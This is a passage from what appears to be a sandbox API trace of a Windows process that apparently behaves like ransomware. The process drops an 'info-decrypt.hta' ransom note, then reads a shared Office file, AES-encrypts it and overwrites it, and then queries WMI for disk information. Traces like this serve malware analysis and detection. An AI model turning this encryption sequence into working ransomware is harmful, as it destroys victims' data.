lpOldMode=0x6bcee88) returned 1 [0209.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", nBufferLength=0x105, lpBuffer=0x6bcea24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpFilePart=0x0) returned 0x44 [0209.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bce8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", lpFilePart=0x0) returned 0x48 [0209.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcedc0) returned 1 [0209.775] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x598 [0209.817] GetFileType (hFile=0x598) returned 0x1 [0209.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcedbc) returned 1 [0209.817] GetFileType (hFile=0x598) returned 0x1 [0209.817] WriteFile (in: hFile=0x598, lpBuffer=0x3507078*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6bcee84, lpOverlapped=0x0 | out: lpBuffer=0x3507078*, lpNumberOfBytesWritten=0x6bcee84*=0x1000, lpOverlapped=0x0) returned 1 [0209.818] WriteFile (in: hFile=0x598, lpBuffer=0x3507078*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x6bcee58, lpOverlapped=0x0 | out: lpBuffer=0x3507078*, lpNumberOfBytesWritten=0x6bcee58*=0x557, lpOverlapped=0x0) returned 1 [0209.819] CloseHandle (hObject=0x598) returned 1 [0209.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", nBufferLength=0x105, lpBuffer=0x6bce9a8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpFilePart=0x0) returned 0x44 [0209.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee54) returned 1 [0209.819] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), fInfoLevelId=0x0, lpFileInformation=0x3508094 | out: lpFileInformation=0x3508094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd)) returned 1 [0210.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee50) returned 1 [0210.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", nBufferLength=0x105, lpBuffer=0x6bce894, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpFilePart=0x0) returned 0x44 [0210.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bced88) returned 1 [0210.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0210.035] GetFileType (hFile=0x384) returned 0x1 [0210.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bced84) returned 1 [0210.035] GetFileType (hFile=0x384) returned 0x1 [0210.035] GetFileSize (in: hFile=0x384, lpFileSizeHigh=0x6bcee90 | out: lpFileSizeHigh=0x6bcee90*=0x0) returned 0x9fd [0210.036] ReadFile (in: hFile=0x384, lpBuffer=0x35115b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6bcee3c, lpOverlapped=0x0 | out: lpBuffer=0x35115b4*, lpNumberOfBytesRead=0x6bcee3c*=0x9fd, lpOverlapped=0x0) returned 1 [0210.056] CloseHandle (hObject=0x384) returned 1 [0210.056] CryptAcquireContextW (in: phProv=0x6bceddc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6bceddc*=0x7aa058) returned 1 [0210.254] CryptGenRandom (in: hProv=0x7aa058, dwLen=0x10, pbBuffer=0x3512c78 | out: pbBuffer=0x3512c78) returned 1 [0211.937] CryptImportKey (in: hProv=0x7aa058, pbData=0x37935e4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6bcedac | out: phKey=0x6bcedac*=0x77af70) returned 1 [0211.937] CryptContextAddRef (hProv=0x7aa058, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.937] CryptContextAddRef (hProv=0x7aa058, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.937] CryptDuplicateKey (in: hKey=0x77af70, pdwReserved=0x0, dwFlags=0x0, phKey=0x6bced9c | out: phKey=0x6bced9c*=0x77b0b0) returned 1 [0211.937] CryptContextAddRef (hProv=0x7aa058, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.937] CryptSetKeyParam (hKey=0x77b0b0, dwParam=0x4, pbData=0x37936c4*=0x1, dwFlags=0x0) returned 1 [0211.937] CryptSetKeyParam (hKey=0x77b0b0, dwParam=0x1, pbData=0x3793690, dwFlags=0x0) returned 1 [0211.937] CryptEncrypt (in: hKey=0x77b0b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37936d4*, pdwDataLen=0x6bcee08*=0xa00, dwBufLen=0xa00 | out: pbData=0x37936d4*, pdwDataLen=0x6bcee08*=0xa00) returned 1 [0211.938] CryptEncrypt (in: hKey=0x77b0b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37940f8*, pdwDataLen=0x6bcee10*=0x0, dwBufLen=0x10 | out: pbData=0x37940f8*, pdwDataLen=0x6bcee10*=0x10) returned 1 [0212.267] CryptDestroyKey (hKey=0x77af70) returned 1 [0212.267] CryptReleaseContext (hProv=0x7aa058, dwFlags=0x0) returned 1 [0212.267] CryptReleaseContext (hProv=0x7aa058, dwFlags=0x0) returned 1 [0212.267] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", nBufferLength=0x105, lpBuffer=0x6bce880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpFilePart=0x0) returned 0x44 [0212.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bced74) returned 1 [0212.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a4 [0212.268] GetFileType (hFile=0x5a4) returned 0x1 [0212.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bced70) returned 1 [0212.268] GetFileType (hFile=0x5a4) returned 0x1 [0212.268] WriteFile (in: hFile=0x5a4, lpBuffer=0x37fcd68*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x6bcee04, lpOverlapped=0x0 | out: lpBuffer=0x37fcd68*, lpNumberOfBytesWritten=0x6bcee04*=0xc10, lpOverlapped=0x0) returned 1 [0212.269] CloseHandle (hObject=0x5a4) returned 1 [0212.271] CoTaskMemAlloc (cb=0x20c) returned 0x7ade98 [0212.271] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7ade98 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0212.271] CoTaskMemFree (pv=0x7ade98) [0212.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6bce868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0212.271] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcedb0 | out: ppv=0x6bcedb0*=0x72015c) returned 0x0 [0212.271] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bceda8 | out: pAptType=0x6bceda8*=1) returned 0x0 [0212.271] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcedac | out: ppvObject=0x6bcedac*=0x0) returned 0x80004002 [0212.272] IUnknown:Release (This=0x72015c) returned 0x1 [0212.272] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce718 | out: ppv=0x6bce718*=0x6736d98) returned 0x0 [0212.272] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce930 | out: ppvObject=0x6bce930*=0x0) returned 0x80004002 [0212.272] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736d98, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce944 | out: ppvObject=0x6bce944*=0x6737f20) returned 0x0 [0212.273] WbemDefPath:IUnknown:Release (This=0x6736d98) returned 0x0 [0212.273] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce564 | out: ppvObject=0x6bce564*=0x6737f20) returned 0x0 [0212.273] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce520 | out: ppvObject=0x6bce520*=0x0) returned 0x80004002 [0212.273] WbemDefPath:IUnknown:AddRef (This=0x6737f20) returned 0x3 [0212.273] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcde7c | out: ppvObject=0x6bcde7c*=0x0) returned 0x80004002 [0212.273] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcde2c | out: ppvObject=0x6bcde2c*=0x0) returned 0x80004002 [0212.273] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcde38 | out: ppvObject=0x6bcde38*=0x77da98) returned 0x0 [0212.273] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77da98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcde40 | out: pCid=0x6bcde40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.273] WbemDefPath:IUnknown:Release (This=0x77da98) returned 0x3 [0212.273] CoGetContextToken (in: pToken=0x6bcde98 | out: pToken=0x6bcde98) returned 0x0 [0212.273] CoGetContextToken (in: pToken=0x6bce2a0 | out: pToken=0x6bce2a0) returned 0x0 [0212.273] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce330 | out: ppvObject=0x6bce330*=0x0) returned 0x80004002 [0212.273] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x2 [0212.273] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x1 [0212.273] CoGetContextToken (in: pToken=0x6bcec28 | out: pToken=0x6bcec28) returned 0x0 [0212.273] CoGetContextToken (in: pToken=0x6bceb88 | out: pToken=0x6bceb88) returned 0x0 [0212.273] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f20, riid=0x6bcec58*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcec54 | out: ppvObject=0x6bcec54*=0x6737f20) returned 0x0 [0212.273] WbemDefPath:IUnknown:AddRef (This=0x6737f20) returned 0x3 [0212.273] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x2 [0212.273] WbemDefPath:IWbemPath:SetText (This=0x6737f20, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0212.273] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f20, puCount=0x6bceddc | out: puCount=0x6bceddc*=0x0) returned 0x0 [0212.273] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6bcedd8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedd8*=0x20, pszText=0x0) returned 0x0 [0212.274] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6bcedd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0212.274] WbemDefPath:IWbemPath:GetInfo (in: This=0x6737f20, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0212.274] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f20, puCount=0x6bceddc | out: puCount=0x6bceddc*=0x0) returned 0x0 [0212.274] WbemDefPath:IWbemPath:GetInfo (in: This=0x6737f20, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0212.274] WbemDefPath:IWbemPath:GetInfo (in: This=0x6737f20, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0212.274] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f20, puCount=0x6bced5c | out: puCount=0x6bced5c*=0x0) returned 0x0 [0212.274] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6bced48 | out: puCount=0x6bced48*=0x2) returned 0x0 [0212.274] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bced44*=0x0, pszText=0x0 | out: puBuffLength=0x6bced44*=0xf, pszText=0x0) returned 0x0 [0212.274] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bced44*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced44*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.274] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcecf8 | out: ppv=0x6bcecf8*=0x72015c) returned 0x0 [0212.274] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcecf0 | out: pAptType=0x6bcecf0*=1) returned 0x0 [0212.274] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcecf4 | out: ppvObject=0x6bcecf4*=0x0) returned 0x80004002 [0212.274] IUnknown:Release (This=0x72015c) returned 0x1 [0212.275] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce660 | out: ppv=0x6bce660*=0x6737048) returned 0x0 [0212.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737048, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce878 | out: ppvObject=0x6bce878*=0x0) returned 0x80004002 [0212.275] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737048, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce88c | out: ppvObject=0x6bce88c*=0x6738540) returned 0x0 [0212.275] WbemDefPath:IUnknown:Release (This=0x6737048) returned 0x0 [0212.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce4ac | out: ppvObject=0x6bce4ac*=0x6738540) returned 0x0 [0212.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce468 | out: ppvObject=0x6bce468*=0x0) returned 0x80004002 [0212.275] WbemDefPath:IUnknown:AddRef (This=0x6738540) returned 0x3 [0212.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcddc4 | out: ppvObject=0x6bcddc4*=0x0) returned 0x80004002 [0212.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdd74 | out: ppvObject=0x6bcdd74*=0x0) returned 0x80004002 [0212.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcdd80 | out: ppvObject=0x6bcdd80*=0x77db88) returned 0x0 [0212.275] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77db88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdd88 | out: pCid=0x6bcdd88*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.275] WbemDefPath:IUnknown:Release (This=0x77db88) returned 0x3 [0212.275] CoGetContextToken (in: pToken=0x6bcdde0 | out: pToken=0x6bcdde0) returned 0x0 [0212.275] CoGetContextToken (in: pToken=0x6bce1e8 | out: pToken=0x6bce1e8) returned 0x0 [0212.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce278 | out: ppvObject=0x6bce278*=0x0) returned 0x80004002 [0212.275] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x2 [0212.275] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x1 [0212.275] CoGetContextToken (in: pToken=0x6bceb70 | out: pToken=0x6bceb70) returned 0x0 [0212.275] CoGetContextToken (in: pToken=0x6bcead0 | out: pToken=0x6bcead0) returned 0x0 [0212.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x6bceba0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bceb9c | out: ppvObject=0x6bceb9c*=0x6738540) returned 0x0 [0212.276] WbemDefPath:IUnknown:AddRef (This=0x6738540) returned 0x3 [0212.276] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x2 [0212.276] WbemDefPath:IWbemPath:SetText (This=0x6738540, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0212.276] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738540, puCount=0x6bced20 | out: puCount=0x6bced20*=0x2) returned 0x0 [0212.276] WbemDefPath:IWbemPath:GetText (in: This=0x6738540, lFlags=4, puBuffLength=0x6bced1c*=0x0, pszText=0x0 | out: puBuffLength=0x6bced1c*=0xf, pszText=0x0) returned 0x0 [0212.276] WbemDefPath:IWbemPath:GetText (in: This=0x6738540, lFlags=4, puBuffLength=0x6bced1c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced1c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.276] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bced20 | out: ppv=0x6bced20*=0x72015c) returned 0x0 [0212.276] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bced18 | out: pAptType=0x6bced18*=1) returned 0x0 [0212.276] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bced1c | out: ppvObject=0x6bced1c*=0x0) returned 0x80004002 [0212.276] IUnknown:Release (This=0x72015c) returned 0x1 [0212.276] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce940 | out: ppv=0x6bce940*=0x673d1e0) returned 0x0 [0212.277] WbemLocator:IUnknown:QueryInterface (in: This=0x673d1e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bceb58 | out: ppvObject=0x6bceb58*=0x0) returned 0x80004002 [0212.277] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d1e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb6c | out: ppvObject=0x6bceb6c*=0x6736dc8) returned 0x0 [0212.277] WbemLocator:IUnknown:Release (This=0x673d1e0) returned 0x0 [0212.277] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dc8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce78c | out: ppvObject=0x6bce78c*=0x6736dc8) returned 0x0 [0212.277] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dc8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce748 | out: ppvObject=0x6bce748*=0x0) returned 0x80004002 [0212.277] WbemLocator:IUnknown:AddRef (This=0x6736dc8) returned 0x3 [0212.277] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dc8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce0a4 | out: ppvObject=0x6bce0a4*=0x0) returned 0x80004002 [0212.277] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dc8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce054 | out: ppvObject=0x6bce054*=0x0) returned 0x80004002 [0212.277] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dc8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce060 | out: ppvObject=0x6bce060*=0x0) returned 0x80004002 [0212.277] CoGetContextToken (in: pToken=0x6bce0c0 | 